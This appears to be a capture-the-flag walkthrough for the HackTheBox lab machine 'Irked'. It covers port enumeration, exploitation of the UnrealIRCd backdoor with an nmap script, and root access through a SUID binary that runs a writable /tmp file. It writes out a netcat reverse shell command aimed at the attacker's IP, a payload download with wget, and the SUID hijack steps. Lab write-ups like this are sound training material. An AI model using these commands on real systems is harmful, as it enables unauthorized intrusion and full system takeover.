Irked

Type: Linux

Difficuility: Easy

Link: https://app.hackthebox.com/machines/Irked

IP Address: 10.10.10.117

Enumeration

  • Run nmap: sudo nmap -sC -sV -p- -Pn -oA Irked 10.10.10.117

Nmap Results

  • 22/tcp is SSH and is secure by default (not many CVEs) so skip it

  • 80/tcp is HTTP, start running gobuster and enumerate the site manually

    Index Page

    Apache Default Page

    Gobuster results

    • \/manual is the default Apache page (Rabbithole, tried a few CVEs but nothing worked)

  • 111 is RPCBind after looking into it, it turned out to be just another rabbithole.

  • 6697, 8067, 38196, 65534 are related to UnRealIRC and the index page included a smiley face and a note about IRC so it's most likely these ports.

Exploitation

  • Check for nmap scripts related to UnRealIRC, cd \/usr\/share\/nmap\scripts && ls | grep -i irc

  • run this script on the target, sudo nmap -p 6697,8067,65534 --script irc-unrealircd-backdoor 10.10.10.117

  • Find that one of the ports is vulnerable (8067)

  • Start a listner, nc -nlvp 4444

  • Exploit the target using the script, nmap -p 8067 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.16.3 4444" 10.10.10.117

  • Get a reverse shell.

  • Upgrade the reverse shell,

    • python -c 'import pty; pty.spawn("/bin/bash")' - Spwans /bin/bash using Python’s PTY module

    • Ctrl + Z - Background the shell.

    • stty raw -echo && fg - Upgrade the local terminal with stty and foreground the reverse shell.

    • Double Enter

Privilege Escalation

  • Transfer LinEnum to the target

    • python3 -m http.server 8080 - Starts a basic http server (On Your Own Machine)

    • cd /tmp - Because we can write/read/execute into/from tmp. (On the Target Machine)

    • wget http://10.10.16.3:8080/LinEnum.sh - Downloads LinEnum.sh on the target machine (On the Target Machine)

    • chmod +x LinEnum.sh - Make it executable.

    • ./LinEnum.sh - Runs LinEnum.

  • LinEnum:

SUID Files (LinEnum)

  • There is a file name viewuser with SUID bit set.

When the SUID bit is set for a file, it will execute with the level of privilege that matches the user who owns the file.

  • Run the file (viewuser)

  • The file runs another file, tmp/listusers

tmp/listuser

  • Edit the file so that it runs bash (echo "bash" > /tmp/Listusers)

/tmp/Listusers

  • When running I got permission denied so I edited the permissions of the Listusers file (chmod +xwr /tmp/Listuser/)

  • After running viewuser we get root access.

Flags:

User Flag
Root Flag
PreviousHTB Archived Write-Ups (Check)NextNibbles

Last updated